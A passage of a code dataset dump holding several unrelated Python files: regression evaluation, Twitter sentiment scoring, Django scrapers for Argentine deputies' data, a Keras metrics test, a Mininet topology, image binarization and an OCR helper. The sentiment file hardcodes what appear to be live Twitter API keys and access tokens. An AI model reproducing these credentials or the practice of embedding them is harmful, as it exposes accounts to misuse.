0.01, 'loss': 'ls', 'verbose': 1}\nclf = GradientBoostingRegressor(**params)\nr = linear_model.LinearRegression()\nridge = 
Ridge(alpha=1.0)\n\n\n\n# test the model with 10 fold cross validation\npredicted = cross_val_predict(svr_rbf,training_X,training_Y, cv=10)\n\n\n\n# report the results using diff evaluation scores\nprint(\"Mean absolute error \",mean_absolute_error(training_Y, predicted))\nprint(\"explained_variance_score \",explained_variance_score(training_Y, predicted))\nprint(\"Mean Squared Error\",mean_squared_error(training_Y, predicted))\nprint(\"R2\",r2_score(training_Y, predicted))\n\n\n\n\"\"\"\nall 10 folds cross-validation\n\nModel Explained variance score Mean absolute error Mean squared error R² score, the coefficient of determination\n\n--------Simple Linear Regression \nMean absolute error 0.07042462538734469\nexplained_variance_score 0.0004416111465148642\nMean Squared Error 0.02868278898950552\nR2 0.0004416110718995503\n\n----------SVR Rbf \nexplained_variance_score -0.0007286527751753091\nMean Squared Error 0.030256845295889515\nR2 -0.054412231288652135\n\nexplained_variance_score -0.0006681239841130893\nMean Squared Error 0.030258686679529447\nR2 -0.05447640114553742\n\n----------Gradient Boosting regression\nMean absolute error 0.07058640152386743\nexplained_variance_score -0.002300711123233379\nMean Squared Error 0.028761481551683146\nR2 -0.002300723737301613\n\n-----------Ridge Regression\nMean absolute error 0.07042462385867472\nexplained_variance_score 0.00044161228873362823\nMean Squared Error 0.0286827889567291\nR2 0.0004416122141157608\n\n\n\"\"\"\n","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"267037984","text":"import tweepy,random,time,sys\nfrom textblob import TextBlob\nclass sentiment:\n def __init__(self):\n global api\n consumer_key = '2sHw7Vi6MeMCiE4cIChSkzJiU'\n consumer_secret = 'zwmHQfIkyrDDV2f50RMZey8DnhxLxXDQuCrFQDi4WWdECIUEUI'\n access_token = '1157382902793015297-OKerCHHnHxBmReCSDXDGktphYdCd0g'\n access_token_secret = 'zwrdalxvhHGzUea08ne9LjVmVRasww98WFrRGkgy3pUDX'\n def OAuth():\n try:\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n return auth\n except Exception as e:\n return None\n oauth = OAuth()\n api=tweepy.API(oauth)\n def search(self,searchterm):\n global api\n max_tweets=10000\n word=searchterm\n public_tweets=api.search(word, count=max_tweets)\n polarityscore=0\n subjectivityscore=0\n tweetcount=0\n for tweet in public_tweets:\n try:\n analysis = TextBlob(tweet.text)\n subjectivityscore += analysis.subjectivity\n polarityscore += analysis.polarity\n tweetcount += 1\n except:\n pass\n avr_pol=polarityscore/tweetcount\n avr_subj=subjectivityscore/tweetcount\n return avr_pol, avr_subj\n","sub_path":"StockTradingBot/twitter_sentiment.py","file_name":"twitter_sentiment.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"339367860","text":"# -*- coding: utf-8 -*-\r\n#Python modules\r\nimport os\r\nimport re\r\nimport csv\r\n#Django functions\r\nfrom django.shortcuts import render\r\nfrom django.http import JsonResponse\r\n#Django models\r\nfrom models import Asistencias\r\n#Json serializers\r\nfrom django.core import serializers\r\nimport json\r\n#Dependencies\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom unidecode import unidecode\r\n\r\napp_path = os.path.dirname(os.path.realpath(__file__))\r\n\r\ndef 
MainApi(request):\r\n\t#Number of sessions\r\n\tcantidad_sesiones = 10\r\n\tperiodo = 134\r\n\tslug_sesiones = 'Se realizaron 9 Sesiones que comprenden 9 reuniones (incluye 1 Sesión Informativa) + 1 Asamblea Legislativa. TOTAL: 10'\r\n\r\n\tsesiones = list()\r\n\twith open(app_path+'/static/tabula-PRESENTISMO_2016_0816.csv', 'rb') as f:\r\n\t\treader = csv.reader(f)\r\n\t\treader.next()\r\n\t\tfor row in reader:\r\n\t\t\tsesiones.append({'fecha':row[0], 'sesion':row[1], 'presente':row[2], 'ausente':row[3], 'licencia':row[4], 'mo':row[5]})\r\n\r\n\treturn JsonResponse({'periodo':periodo, 'cantidad_sesiones':cantidad_sesiones,'slug_sesiones':slug_sesiones,'sesiones':sesiones})\r\n\r\n\r\ndef DiputadosApi(request):\r\n\thtml = requests.get('http://www.diputados.gov.ar/diputados/listadip.html')\r\n\tsoup = BeautifulSoup(html.text, 'html5lib')\r\n\tdata = soup.find('table',{'id':'tablesorter'}).findAll('tr')[1:]\r\n\r\n\ttmp_dict = {}\r\n\tdiputados = []\r\n\r\n\tfor diputado in data:\r\n\t\tdatos = diputado.findAll('td')\r\n\t\timg = datos[0].img.attrs['src']\r\n\t\tif datos[1].find('a'):\r\n\t\t\turl_diputado = datos[1].a.attrs['href']\r\n\t\t\tnombre = datos[1].a.get_text().strip()\r\n\t\telse:\r\n\t\t\tnombre = datos[1].get_text().strip()\r\n\t\t\turl_diputado = ''\r\n\t\tid_diputado = url_diputado.split('/')[2]\r\n\t\tdistrito = datos[2].get_text().strip()\r\n\t\tini_mandato = datos[3].get_text().strip()\r\n\t\tfin_mandato = datos[4].get_text().strip()\r\n\t\tbloque = datos[5].get_text().strip()\r\n\r\n\t\t# Corrections to match the deputies' \"bloque\" with the attendance \"bloque\"\r\n\t\tif bloque == 'UCR':\r\n\t\t\tbloque = 'UNION CIVICA RADICAL'\r\n\t\telif bloque == 'PROYECTO SUR - UNEN':\r\n\t\t\tbloque = 'PROYECTO SUR'\r\n\t\telif bloque == 'BRIGADIER GENERAL JUAN BAUTISTA BUSTOS':\r\n\t\t\tbloque = 'BG JUAN B. BUSTOS'\r\n\t\telif bloque == 'FRENTE CIVICO Y SOCIAL DE CATAMARCA':\r\n\t\t\tbloque = 'FTE. CIVICO Y SOCIAL DE CATAMARCA'\r\n\t\telif bloque == 'DEMOCRATA PROGRESISTA':\r\n\t\t\tbloque = 'PARTIDO DEMOCRATA PROGRESISTA'\r\n\t\telif bloque == 'MOV POP NEUQUINO':\r\n\t\t\tbloque = 'MOVIMIENTO POPULAR NEUQUINO'\r\n\t\telif bloque == 'LIBERTAD VALORES Y CAMBIO':\r\n\t\t\tbloque = 'LIBERTAD, VALORES Y CAMBIO'\r\n\t\telif bloque == 'FRENTE DE IZQUIERDA Y DE LOS TRABAJADORES':\r\n\t\t\tbloque = 'FTE. DE IZQUIERDA Y DE LOS TRABAJADORES'\r\n\t\t# Correction to match the deputies' \"nombre\" with the attendance \"nombre\"\r\n\t\tif nombre == 'SOSA, SOLEDAD':\r\n\t\t\tnombre = 'SOSA CAPURRO, VICTORIA SOLEDAD'\r\n\r\n\t\ttmp_dict = {'id':id_diputado,'nombre':nombre.upper(),'bloque':bloque.upper(),'distrito':distrito,'ini':ini_mandato,'fin':fin_mandato,'img':img,'url':url_diputado}\r\n\t\tdiputados.append(tmp_dict)\r\n\r\n\treturn JsonResponse(diputados, safe=False)\r\n\r\n\r\ndef DiputadoApi(request, id):\r\n\thtml = requests.get('http://www.diputados.gov.ar/diputados/'+id)\r\n\tsoup = BeautifulSoup(html.text, 'html5lib')\r\n\tinfo = soup.find('div', {'class':'detalleDip container appInvisible'})\r\n\r\n\timg = info.find('div',{'class':'verticalPad'}).find('img',{'class':'img-circle'}).attrs['src']\r\n\tcargo = info.h2.get_text().strip()\r\n\tnombre = info.h1.get_text().strip()\r\n\tbloque = info.find('div',{'class':'col-sm-12 col-md-4'}).contents[4].strip()\r\n\temail = info.find('a').get_text().strip()\r\n\ttel = info.findAll('div', {'class':'col-sm-12 col-md-2 verticalPad'})[1].contents[4].replace(u'Teléfono:','').strip()\r\n\tdistrito_escudo = info.find('div', {'class':'col-sm-12 col-md-2 distrito'}).img.attrs['src'].strip()\r\n\tdistrito = info.find('div', {'class':'col-sm-12 col-md-2 distrito'}).div.get_text().strip()\r\n\r\n\tdiputado = {'id':id,'nombre':nombre,'bloque':bloque,'distrito':distrito,'cargo':cargo,'email':email,'tel':tel,'img':img,'distrito_escudo':distrito_escudo}\r\n\r\n\treturn JsonResponse(diputado, safe=False)\r\n\r\n\r\ndef DiputadoProyectosApi(request, id):\r\n\thtml = requests.get('http://www.diputados.gov.ar/diputados/'+id+'/listadodeproy.html?size=1000')\r\n\tsoup = BeautifulSoup(html.text, 'html5lib')\r\n\tinfo = soup.find('table', {'id':'tabla-proyectos'}).findAll('tr')[1:]\r\n\r\n\ttmp_dict = {}\r\n\tproyectos = []\r\n\r\n\tfor proyecto in info:\r\n\t\tdatos = proyecto.findAll('td')\r\n\t\texpediente_url = datos[0].a.attrs['href']\r\n\t\tid_proyecto = re.search('id=([0-9]+)', datos[0].a.attrs['href']).group(1)\r\n\t\texpediente = datos[0].a.get_text()\r\n\t\ttipo = datos[1].get_text()\r\n\t\tsumario = datos[2].get_text()\r\n\t\tfecha = datos[3].get_text()\r\n\r\n\t\ttmp_dict = {'expediente':expediente,'fecha':fecha,'tipo':tipo,'sumario':sumario,'expediente_url':expediente_url,'id_proyecto':id_proyecto,'id':id}\r\n\t\tproyectos.append(tmp_dict)\r\n\r\n\treturn JsonResponse(proyectos, safe=False)\r\n\r\n\r\ndef ProyectoApi(request, id):\r\n\r\n\thtml = requests.get('http://www.diputados.gov.ar/proyectos/proyecto.jsp?id='+id)\r\n\tsoup = BeautifulSoup(html.text, 'html5lib')\r\n\tcontent = soup.find('div', {'id':'proyecto-tab'}).find('div',{'class':'tab-content'})\r\n\r\n\ttexto = content.find('div',{'id':'texto'}).get_text()\r\n\r\n\tfundamentos = unidecode(content.find('div',{'id':'fundamentos'}).get_text())\r\n\r\n\tdata_firmantes = content.find('div',{'id':'firmantes'}).find('table').findAll('tr')\r\n\tfirmantes = []\r\n\tfor firmante in data_firmantes[1:]:\r\n\t\tdatos = firmante.findAll('td')\r\n\t\tnombre = datos[0].get_text()\r\n\t\tdistrito = datos[1].get_text()\r\n\t\tbloque = datos[2].get_text()\r\n\t\tfirmantes.append({'firmante':nombre,'distrito':distrito,'bloque':bloque})\r\n\r\n\tcomision = []\r\n\tdata_tramite = soup.find('div', {'id':'tramites'}).find('table')\r\n\ttitulo_tramite = data_tramite.caption.get_text().strip()\r\n\tfor t in data_tramite.findAll('tr')[1:]:\r\n\t\tdatos = t.findAll('td')\r\n\t\tcomision.append(datos[0].get_text())\r\n\r\n\tproyecto = {'id':id,'texto':texto,'fundamentos':fundamentos,'firmantes':firmantes,'tramite':{'titulo':titulo_tramite,'comisiones':comision}}\r\n\r\n\treturn JsonResponse(proyecto, safe=False)\r\n\r\n\r\ndef DiputadoComisionesApi(request, id):\r\n\thtml = requests.get('http://www.diputados.gov.ar/diputados/'+ id +'/comisiones.html')\r\n\tsoup = BeautifulSoup(html.text, 'html5lib')\r\n\tinfo = soup.find('table', {'id':'tablaComisiones'}).findAll('tr')[1:]\r\n\r\n\tcomisiones = []\r\n\r\n\tfor c in info:\r\n\t\tdatos = c.findAll('td')\r\n\t\tcomision = datos[0].a.get_text()\r\n\t\tcargo = datos[1].get_text().strip()\r\n\t\tcomisiones.append({'comision':comision,'cargo':cargo})\r\n\r\n\treturn JsonResponse({'id':id,'comisiones':comisiones}, safe=False)\r\n\r\n\r\ndef AsistenciasApi(request):\r\n\thtml = requests.get('http://www.diputados.gov.ar/diputados/listadip.html')\r\n\tsoup = BeautifulSoup(html.text, 'html5lib')\r\n\tdata = soup.find('table',{'id':'tablesorter'}).findAll('tr')[1:]\r\n\r\n\ttmp_dict = {}\r\n\tdiputados = []\r\n\r\n\tfor diputado in data:\r\n\t\tdatos = diputado.findAll('td')\r\n\t\tif datos[1].find('a'):\r\n\t\t\turl_diputado = datos[1].a.attrs['href']\r\n\t\t\tnombre = datos[1].a.get_text()\r\n\t\telse:\r\n\t\t\tnombre = datos[1].get_text()\r\n\t\t\turl_diputado = ''\r\n\t\tid_diputado = url_diputado.split('/')[2]\r\n\t\tbloque = datos[5].get_text()\r\n\r\n\t\t# Corrections to match the deputies' \"bloque\" with the attendance \"bloque\"\r\n\t\tif bloque == 'UCR':\r\n\t\t\tbloque = 'UNION CIVICA RADICAL'\r\n\t\telif bloque == 'PROYECTO SUR - UNEN':\r\n\t\t\tbloque = 'PROYECTO SUR'\r\n\t\telif bloque == 'BRIGADIER GENERAL JUAN BAUTISTA BUSTOS':\r\n\t\t\tbloque = 'BG JUAN B. BUSTOS'\r\n\t\telif bloque == 'FRENTE CIVICO Y SOCIAL DE CATAMARCA':\r\n\t\t\tbloque = 'FTE. CIVICO Y SOCIAL DE CATAMARCA'\r\n\t\telif bloque == 'DEMOCRATA PROGRESISTA':\r\n\t\t\tbloque = 'PARTIDO DEMOCRATA PROGRESISTA'\r\n\t\telif bloque == 'MOV POP NEUQUINO':\r\n\t\t\tbloque = 'MOVIMIENTO POPULAR NEUQUINO'\r\n\t\telif bloque == 'LIBERTAD VALORES Y CAMBIO':\r\n\t\t\tbloque = 'LIBERTAD, VALORES Y CAMBIO'\r\n\t\telif bloque == 'FRENTE DE IZQUIERDA Y DE LOS TRABAJADORES':\r\n\t\t\tbloque = 'FTE. DE IZQUIERDA Y DE LOS TRABAJADORES'\r\n\r\n\r\n\t\tif nombre.find(' ',nombre.find(', ')+2) == -1:\r\n\t\t\tnuevo_nombre = nombre.upper()\r\n\t\telse:\r\n\t\t\tnuevo_nombre = nombre[:nombre.find(' ',nombre.find(', ')+2)].upper()\r\n\r\n\t\t#print 'DP: '+nuevo_nombre\r\n\r\n\t\tasistencia = Asistencias.objects.filter(nombre_match=nuevo_nombre, bloque=bloque)\r\n\t\tif asistencia:\r\n\t\t\tfor obj in asistencia:\r\n\t\t\t\tpresente = obj.presente\r\n\t\t\t\tausente = obj.ausente\r\n\t\t\t\tlicencia = obj.licencia\r\n\t\t\t\tmo = obj.mo\r\n\t\t\t\t#print 'AS: '+obj.nombre_match\r\n\t\telse:\r\n\t\t\tpresente = None\r\n\t\t\tausente = None\r\n\t\t\tlicencia = None\r\n\t\t\tmo = None\r\n\r\n\t\ttmp_dict = {'id':id_diputado,'nombre':nombre.upper(),'bloque':bloque.upper(),'presente':presente,'ausente':ausente,'licencia':licencia,'mo':mo}\r\n\t\tdiputados.append(tmp_dict)\r\n\r\n\treturn JsonResponse(diputados, safe=False)\r\n\r\n\r\ndef AsistenciasUpdate(request):\r\n\r\n\tdef make_int(num):\r\n\t\tif num == '':\r\n\t\t\treturn 0\r\n\t\telse:\r\n\t\t\treturn int(num)\r\n\r\n\r\n\tasistencias = []\r\n\r\n\twith open(app_path+'/static/tabula-ESTADISTICAS_2016_0816.csv', 'rb') as f:\r\n\t\treader = csv.reader(f)\r\n\t\t#Skip to the second record, since the first one holds the column names\r\n\t\treader.next()\r\n\t\tfor row in reader:\r\n\t\t\t# Unidecode takes Unicode characters and returns their ASCII equivalent, e.g. 'á' returns 'a'\r\n\t\t\t# ord() returns the Unicode code point | Á=193 É=201 Í=205 Ó=211 Ú=218 Ì=204\r\n\t\t\tbloque = ''.join(unidecode(c) if ord(c)==193 or ord(c)==201 or ord(c)==205 or ord(c)==211 or ord(c)==218 or ord(c)==204 else c for c in row[0].decode('utf8').upper()).replace('\\r', ' ')\r\n\t\t\tnombre = ''.join(unidecode(c) if ord(c)==193 or ord(c)==201 or ord(c)==205 or ord(c)==211 or ord(c)==218 or ord(c)==204 else c for c in row[1].decode('utf8').upper()).split('\\r')\r\n\t\t\t\r\n\t\t\tobservacion = ''\r\n\t\t\tif len(nombre) > 1:\r\n\t\t\t\tfor e in nombre[1:]:\r\n\t\t\t\t\tobservacion += ' ' + e\r\n\t\t\t\tobservacion = observacion.replace('OBSERVACION: ','').strip()\r\n\r\n\t\t\tnombre = nombre[0].strip().replace('-',' ')\r\n\r\n\t\t\t# In the attendance PDF they are listed under the \"Frente para la Victoria - PJ\" bloc,\r\n\t\t\t# but on the deputies' site they belong to the \"Frente de la Concordia Misionero\"\r\n\t\t\tif nombre == 'CLOSS, MAURICE FABIAN' or nombre == 'FRANCO, JORGE DANIEL' or nombre == 'RISKO, SILVIA LUCRECIA':\r\n\t\t\t\tbloque = 'FRENTE DE LA CONCORDIA MISIONERO'\r\n\t\t\t# In the attendance PDF it appears as \"Frente para la Victoria - PJ\"\r\n\t\t\telif nombre == 'CARLOTTO, REMO GERARDO' or nombre == 'DE PONTI, LUCILA MARIA' or nombre == 'FERREYRA, ARACELI SUSANA DEL ROSARIO' or nombre == 'GROSSO, LEONARDO' or nombre == 'GUZMAN, ANDRES ERNESTO' or nombre == 'HORNE, SILVIA RENEE':\r\n\t\t\t\tbloque = 'PERONISMO PARA LA VICTORIA'\r\n\t\t\t# On the deputies' site the bloc name uses the word CAMBIO instead of CAMBIOS\r\n\t\t\telif bloque == 'LIBERTAD, VALORES Y CAMBIOS':\r\n\t\t\t\tbloque = 'LIBERTAD, VALORES Y CAMBIO'\r\n\r\n\t\t\t#nombre_match\r\n\t\t\tif nombre.find(' ',nombre.find(', ')+2) == -1:\r\n\t\t\t\tnuevo_nombre = nombre\r\n\t\t\telse:\r\n\t\t\t\tnuevo_nombre = nombre[:nombre.find(' ',nombre.find(', ')+2)]\r\n\r\n\t\t\tupdated_values = {'nombre':nombre,'bloque':bloque,'nombre_match':nuevo_nombre,'presente':make_int(row[3].decode('utf8')),'ausente':make_int(row[4].decode('utf8')),'licencia':make_int(row[5].decode('utf8')),'mo':make_int(row[6].decode('utf8')),'observacion':observacion}\r\n\t\t\tobj, created = Asistencias.objects.update_or_create(nombre=nombre, bloque=bloque, defaults=updated_values)\r\n\t\t\tasistencias.append({'objeto':serializers.serialize('json',[obj,]),'creado':created})\r\n\r\n\treturn JsonResponse(asistencias, safe=False)\r\n\r\n##########################\r\n\r\n\r\n##########################\r\n\r\ndef Index(request):\r\n\treturn render(request, 'index.html')\r\n\r\ndef Presentismo(request):\r\n\t#attendance data\r\n\tresponse = requests.get('https://diputadosarg.herokuapp.com/asistencias/')\r\n\tdata_asistencias = json.loads(response.text)\r\n\t#general data\r\n\tresponse = requests.get('https://diputadosarg.herokuapp.com/main/')\r\n\tdata_gral = json.loads(response.text)\r\n\r\n\tsesiones = data_gral['cantidad_sesiones']\r\n\r\n\testadistica = {}\r\n\tfor diputado in data_asistencias:\r\n\t\tif estadistica.get(diputado['bloque']) == None:\r\n\t\t\testadistica[diputado['bloque']] = {}\r\n\t\t\testadistica[diputado['bloque']]['presente'] = diputado['presente']\r\n\t\t\testadistica[diputado['bloque']]['ausente'] = diputado['ausente']\r\n\t\t\testadistica[diputado['bloque']]['licencia'] = diputado['licencia']\r\n\t\t\testadistica[diputado['bloque']]['mo'] = diputado['mo']\r\n\t\t\testadistica[diputado['bloque']]['bancas'] = 1\r\n\t\telse:\r\n\t\t\testadistica[diputado['bloque']]['presente'] = estadistica.get(diputado['bloque']).get('presente', 0) + diputado['presente']\r\n\t\t\testadistica[diputado['bloque']]['ausente'] = estadistica.get(diputado['bloque']).get('ausente', 0) + diputado['ausente']\r\n\t\t\testadistica[diputado['bloque']]['licencia'] = estadistica.get(diputado['bloque']).get('licencia', 0) + diputado['licencia']\r\n\t\t\testadistica[diputado['bloque']]['mo'] = estadistica.get(diputado['bloque']).get('mo', 0) + diputado['mo']\r\n\t\t\testadistica[diputado['bloque']]['bancas'] = estadistica.get(diputado['bloque']).get('bancas', 0) + 1\r\n\r\n\tfor bloque, values in estadistica.iteritems():\r\n\t\testadistica[bloque]['presentismo'] = round(float(values['presente']) / float(values['bancas']) * float(sesiones), 2)\r\n\r\n\treturn render(request, 'presentismo.html', {'estadistica':estadistica, 'data_gral':data_gral})","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"219284492","text":"import keras\nimport keras.backend\nfrom .. 
import keras_metrics\nimport itertools\nimport numpy\nimport unittest\nimport os.path\n\n\ndef ref_true_pos(y_true, y_pred):\n    return numpy.sum(numpy.logical_and(numpy.round(y_pred) == 1, y_true == 1))\n\n\ndef ref_false_pos(y_true, y_pred):\n    return numpy.sum(numpy.logical_and(numpy.round(y_pred) == 1, y_true == 0))\n\n\ndef ref_true_neg(y_true, y_pred):\n    return numpy.sum(numpy.logical_and(numpy.round(y_pred) == 0, y_true == 0))\n\n\ndef ref_false_neg(y_true, y_pred):\n    return numpy.sum(numpy.logical_and(numpy.round(y_pred) == 0, y_true == 1))\n\nclass TestMetrics(unittest.TestCase):\n\n    def test_metrics(self):\n        # numpy.random.seed(2334) # Fix seed\n\n        tp = keras_metrics.true_positive()\n        tn = keras_metrics.true_negative()\n        fp = keras_metrics.false_positive()\n        fn = keras_metrics.false_negative()\n\n        precision = keras_metrics.precision()\n        recall = keras_metrics.recall()\n        f1 = keras_metrics.f1_score()\n\n        model_fn = \"./temp_model.hdf5\"\n        model = keras.models.Sequential()\n        # model.add(keras.layers.Input((1,)))\n        model.add(keras.layers.Activation(keras.backend.sin, input_shape=(1,)))\n        model.add(keras.layers.Activation(keras.backend.abs))\n\n        model.compile(optimizer=\"sgd\",\n                      loss=\"binary_crossentropy\",\n                      metrics=[tp, tn, fp, fn, precision, recall, f1])\n\n        samples = 10000\n        batch_size = 100\n        lim = numpy.pi/2\n\n        numpy.random.seed(2333) # Fix seed\n        x = numpy.random.uniform(0, lim, (samples, 1))\n        y = numpy.random.randint(2, size=(samples, 1))\n\n        if os.path.isfile(model_fn):\n            print(\"Load saved model weights from %s\" % model_fn)\n            model.load_weights(model_fn)\n        else:\n            model.fit(x, y, epochs=10, batch_size=batch_size)\n            model.save_weights(model_fn, overwrite=False)\n            print(\"Save model weights to %s\" % model_fn)\n\n        print(\"Evaluate model...\")\n        metrics = model.evaluate(x, y, batch_size=batch_size)[1:]\n        y_pred = model.predict(x)\n\n        metrics = list(map(float, metrics))\n\n        tp_val = metrics[0]\n        tn_val = metrics[1]\n        fp_val = metrics[2]\n        fn_val = metrics[3]\n\n        precision = metrics[4]\n        recall = metrics[5]\n        f1 = metrics[6]\n\n        expected_precision = tp_val / (tp_val + fp_val)\n        expected_recall = tp_val / (tp_val + fn_val)\n\n        f1_dividend = (expected_precision*expected_recall)\n        f1_divisor = (expected_precision+expected_recall)\n        expected_f1 = (2 * f1_dividend / f1_divisor)\n\n        self.assertGreaterEqual(tp_val, 0.0)\n        self.assertGreaterEqual(fp_val, 0.0)\n        self.assertGreaterEqual(fn_val, 0.0)\n        self.assertGreaterEqual(tn_val, 0.0)\n\n        # Compare to numpy estimation\n        expected_tp = ref_true_pos(y, y_pred)\n        expected_fp = ref_false_pos(y, y_pred)\n        expected_fn = ref_false_neg(y, y_pred)\n        expected_tn = ref_true_neg(y, y_pred)\n\n        self.assertEqual(tp_val, expected_tp)\n        self.assertEqual(fp_val, expected_fp)\n        self.assertEqual(fn_val, expected_fn)\n        self.assertEqual(tn_val, expected_tn)\n\n        # Check summation\n        self.assertEqual(sum(metrics[0:4]), samples)\n\n        places = 4\n        self.assertAlmostEqual(expected_precision, precision, places=places)\n        self.assertAlmostEqual(expected_recall, recall, places=places)\n        self.assertAlmostEqual(expected_f1, f1, places=places)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":3605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"344678871","text":"from mininet.topo import Topo\n\nclass mytopo( Topo ):\n\n    def __init__(self):\n\n        #Init topo\n        Topo.__init__(self)\n        L1=2\n        L2=L1*2\n        L3=L2\n        c=[]\n        
a=[]\n        e=[]\n\n        #add core ovs\n        for i in range(L1):\n            sw =self.addSwitch('c{}'.format(i+1))\n            c.append(sw)\n\n        #add aggregation ovs\n        for i in range(L2):\n            sw =self.addSwitch('a{}'.format(L1+i+1))\n            a.append(sw)\n\n        #add edge ovs\n        for i in range(L3):\n            sw =self.addSwitch('e{}'.format(L1+L2+i+1))\n            e.append(sw)\n\n        #add links between core and aggregation ovs\n        for i in range(L1):\n            sw1 = c[i]\n            for sw2 in a[i/2::L1/2]:\n                self.addLink(sw2,sw1)\n\n        #add links between aggregation and edge ovs\n        for i in range(0,L2,2):\n            for sw1 in a[i:i+2]:\n                for sw2 in e[i:i+2]:\n                    self.addLink(sw2,sw1)\n\n        #add links between hosts and edge ovs\n        count = 1\n        for sw1 in e:\n            for i in range(2):\n                host=self.addHost('h{}'.format(count))\n                self.addLink(sw1,host)\n                count = count + 1\n\ntopos={'mytopo':(lambda:mytopo())}\n\n","sub_path":"toposcript/mytopo.py","file_name":"mytopo.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"64601924","text":"\n# annoying boilerplate\n# get access to other sub folders\nimport sys\nsys.path.append('..')\n\nfrom nhlscrapi._tools import build_enum\n \nStrength = build_enum('Even', 'PP', 'SH')\n\nclass Play(object):\n    def __init__(self):\n        self.play_num = 0\n        self.period = 0\n        self.strength = Strength.Even\n        self.time = { \"min\": 20, \"sec\": 0 }\n        self.vis_on_ice = { }\n        self.home_on_ice = { }\n        self.event = None","sub_path":"nhlscrapi/games/plays.py","file_name":"plays.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"247363331","text":"#!/usr/bin/python3\n\"\"\" Binarize Image\n\nDESCRIPTION/CONTEXT\n-------------------\nMy friend didn't have a scanner so I helped him grayscale and apply\nthresholding to a camera picture of his document to give it the appearance of\na scanned image.\n\nWritten in python2.7\n- Dependencies - OpenCV\n\nINPUTS\n-----\nimage path\n\nOUTPUTS\n-------\nb/w images in ./temp-[IMAGENAME]\n\nRUN\n---\n    $ ls\n    binarize_image.py image1.JPG image2.JPG\n    $ python binarize_image.py image1.JPG image2.JPG\n\nTO DO\n-----\nThis script still adds a little bit of noise to the final image.\n\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nimport cv2\n\ndef binarize_image(paths):\n    images = [cv2.imread(path, 0) for path in paths]\n    R1 = np.arange(3, 13, 2)\n    R2 = np.arange(3, 11, 1)\n\n    for ii, img in enumerate(images):\n        # name the output folder after the input file, not the stringified pixel array\n        temp_dir_path = \"./temp-\" + os.path.basename(paths[ii])\n        os.mkdir(temp_dir_path)\n        for r1 in R1:\n            for r2 in R2:\n                bin_img = cv2.adaptiveThreshold(img, 255,\n                                                cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n                                                cv2.THRESH_BINARY, r1, r2)\n                filename = str(ii)+\"-\"+str(r1)+\"-\"+str(r2)+\".png\"\n                filepath = os.path.join(temp_dir_path, filename)\n                cv2.imwrite(filepath, bin_img)\n\nif __name__ == \"__main__\":\n    paths = [\"./\"+str(x) for x in sys.argv if x != \"binarize_image.py\"]\n    binarize_image(paths)\n","sub_path":"binarize_image.py","file_name":"binarize_image.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"304222535","text":"import easyocr\nfrom easyocr import config as ocr_config\nimport sys\nimport os\n\nWARNING_BORDER = 0.75\n\n\ndef text_recognition(file_path : str, langs = ['en', 'ru']) -> list:\n    \"\"\"return list of ([[x,y],[x,y],[x,y],[x,y]], text_str, probability) based on image\"\"\"\n    reader = easyocr.Reader(langs)\n    #paragraph = True -> 
([[x,y],[x,y],[x,y],[x,y]], paragraph_text)\n #yep, huge chunk and no probabilities.... Can be usefull if you go for captcha or something short\n result = reader.readtext(file_path)\n return result\n\n\ndef get_file_path():\n path = sys.argv[1] if len(sys.argv) > 1 else None\n if not path or not os.path.exists(path): \n manually = input('Path not provided or not found. Want to provide it manually? (y/n)\\n')\n if manually.lower().startswith('y'):\n path = input('Path for image:\\n')\n while not os.path.exists(path):\n path = input(f\"Can't find path{path}. Enter path to image:\\n\")\n return path\n else:\n return None\n return path\n\n\ndef get_languages():\n \"\"\"Return list of selected languages based on sys.argv or else on user choice\"\"\"\n #langs = sys.argv[2:] if len(sys.argv) > 2 else ocr_config.all_lang_list\n #Note: yep, it can't use its' own list : some languages are not found\n langs = sys.argv[2:] if len(sys.argv) > 2 else None\n while not langs:\n langs = input(f'Languages not found. Provide at least one. Available*: {ocr_config.all_lang_list} \\n').split()\n langs = [x for x in langs if x in ocr_config.all_lang_list]\n if (not langs):\n print('Available languages not selected. Breaking routine...')\n return []\n return langs\n\n\ndef write_raw_result(write_path, ocr_raw_result, with_warnings = True):\n \"\"\"Write to a file all text from raw ocr result in one line, no new lines\"\"\"\n with open(write_path, 'w') as result_file:\n for item in ocr_raw_result:\n result_file.write(item[1])\n result_file.write(' ')\n if (with_warnings and len(item) > 1 and item[2] <= WARNING_BORDER):\n print('Warning border triggered for item:')\n print(item)\n\n\ndef get_lines_based_on_coords(ocr_result : str, warnings_on = False) -> list:\n \"\"\"Return list of lines based on coordinates of recognized text\n \n Expects list of ([[x,y],[x,y],[x,y],[x,y]], text_str, probability) to go through\n and try to make lines based on coordinates of recognized text. \n \"\"\"\n #([[238, 248], [320, 248], [320, 276], [238, 276]], 'Альфа\" ', 0.3207814442789472)\n if not ocr_result or len(ocr_result) == 0:\n return []\n x_now = ocr_result[0][0][0][0]\n #Note: if you would decide to work through y, then height_coef has to be around 0.5\n resulting_lines = []\n a_line = []\n for item in ocr_result:\n if warnings_on and item[2] <= WARNING_BORDER:\n print('Warning border triggered for item:')\n print(item)\n if item[0][0][0] < x_now:\n resulting_lines.append(' '.join(a_line))\n a_line = []\n x_now = item[0][0][0]\n a_line.append(item[1])\n #last line will not be added -> add manually\n if a_line:\n resulting_lines.append(' 